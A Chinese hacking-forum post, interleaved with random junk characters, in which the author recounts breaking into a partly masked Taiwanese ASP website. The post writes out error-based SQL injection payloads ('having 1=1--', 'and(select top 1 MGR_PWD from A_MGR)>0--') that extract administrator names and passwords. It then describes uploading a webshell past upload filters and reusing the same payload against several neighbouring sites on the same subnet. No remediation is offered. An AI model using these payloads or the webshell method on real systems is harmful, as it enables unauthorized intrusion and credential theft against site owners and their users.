发现一个注入点
j; }. o* l3 E6 S# a2 z I" Ohttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
8 h5 u! G. U! q+ a3 p6 a
1 Z" }/ s' q# Q l5 a; M1 d习惯性的加’having1=1--- u) M e! f y7 q/ E- V
) t! _3 f4 j7 Z; m0 |6 D/ f9 Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 R6 V0 H7 Y, s0 |* p- A# T: U
+ ~: d( g5 d1 B9 n8 Y6 u
0" `" \7 ]9 c) F9 w4 D
& k; `2 U! X) C o2 `( N爆出Diary_A.dl_Title(这时候很激动啊)- s9 o9 v6 m! Y9 u; X
$ K# F8 D2 j1 i5 W5 t( h# r5 G
那么继续
+ f. A) X5 W/ O3 w) D6 v H2 }8 ohttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—; E; Q& E/ M! G. o K8 i; I
; I1 ^* N- M( d0 t+ V继续,一直爆下去. J' v A! c K6 Y+ b
8 Z+ R1 P, J2 C
爆到几个字段和表段 但是没找到需要的管理用户的字段
7 s' I- K3 K; H" _7 B% y9 {4 ~' x0 f& K
蛋疼了 怎么办 然后去后台登陆页看源码9 F6 K5 i0 Y6 V
; n1 i4 [- V0 c$ I0 f' z8 C
08 h7 P# x' a0 W. t. g4 V
8 {& x/ U9 ?0 g+ u' m
Input name= “ADUID”
! K+ A E! v: x; a" s" kInput name= “ADPWD”
- H3 q9 c- K- c' ]2 a4 _# h
2 E# L" [) E' }很幸运 找到了字段那就继续
' V8 c o$ J3 _/ e6 z7 ?6 n找到之后开始爆用户
$ D4 _$ F7 [. Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
- _2 y3 V/ a$ d. n2 H9 I爆密码6 E7 a$ D: q/ l" H/ o" R6 Z% Y3 I+ s
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
: K9 S$ T1 @7 j0 L2 R1 V$ e: M( T测试了下 这个注入点只能爆到文章哪里的表
; ~ y, ~! R& V, m" w" ^' L" y3 ]& b+ H2 E' a: o" r; X
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
# X; ^0 y' s$ @6 [3 w/ y- W2 ^' h+ r7 ~( D
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
7 y( I; S1 ?5 w9 a/ O
$ S* r; W" e6 k" e! g7 @% F+ ?473* G3 b1 G8 j& p8 g" e+ @' h. r
' f/ \; d# x; U% z* P' j进后台
4 H, I; Z& o% j, n
9 G$ ?9 f) @. Z; O
+ E! A5 H. @9 f; O7 V发现几个上传点 有的地方不能上传 而且防止恶意代码& }( [, [8 p7 Q
2 b; Q. M) I6 r" o4 r
没办法 各种百度各种找大牛 找到一只好像可以突破的马1 _: t. N/ r, g* L5 }% Q% L* k4 H
# K) u# e; W; v2 g
4 Z, I/ a- Y7 ~/ n在系统管理那里直接上传 不过没有显示地址
" c8 ]4 k) A) _9 y$ W& ^. `" s1 R; g9 y- r0 N
再上传一次 抓包 搞定OK; \6 S( P6 f9 G7 P: s) ~
# J. C; b$ q7 \% ?8 H- S# r' L# R+ r, U2 _6 L
; a% Q, m4 w8 g+ H
472+ Y% f7 l7 k6 a8 r; U1 a
5 T3 j* E& Y' M$ P- r晚上不行了 去睡觉。。。
) a/ g6 q. a. k1 a) M; _9 T第二天刚起床 闲的没事做继续日站吧
7 ~% I4 ~" l0 h9 I/ }# r
( j9 S& P q9 K/ P找个站 就把这个站的旁c扫了下! ?9 q6 B% w* Q' f" m
8 L4 V/ r" [. j: d( X3 k. x
发现c段也有一个购物站 ,然后还和这个站的模板差不多
6 v* u- Z, U8 O* p. Y5 B- l3 V: Z6 P3 u1 {
就找到会员登录口测试
0 i1 w1 L+ t% k- [- K( R6 D
# a4 i7 l- F; i'and (select top 1 MGR_UID from A_MGR)>0—
3 H& f- X/ E) n果断爆到了 这时候我很激动 通杀+ A: x$ W! z T( }( p4 a# \# j
' P e, M% E; ~, w3 ?% f再次翻c段8 s& e/ s5 W- G4 p) V
# B8 C1 j4 _9 K0 {% m3 w6 ]翻出几个站 都成功拿下& Y- [3 H6 h8 w. m& o8 d: c. |
1 v1 g' F* Y+ j7 M8 Y( p& ]
( c& F7 ]; l" v" v8 N# T0 w
" k H$ n- ` F( T; \
修复方案:2 s3 j) W! y% d3 ~5 Z% I. [$ O B
他们比我专业 . a# H0 K0 E" M; N# t; k$ f
! x% o8 N* o! _
' M% s3 _9 \ g, T7 _" Q
7 w6 W% r# S: W0 Q |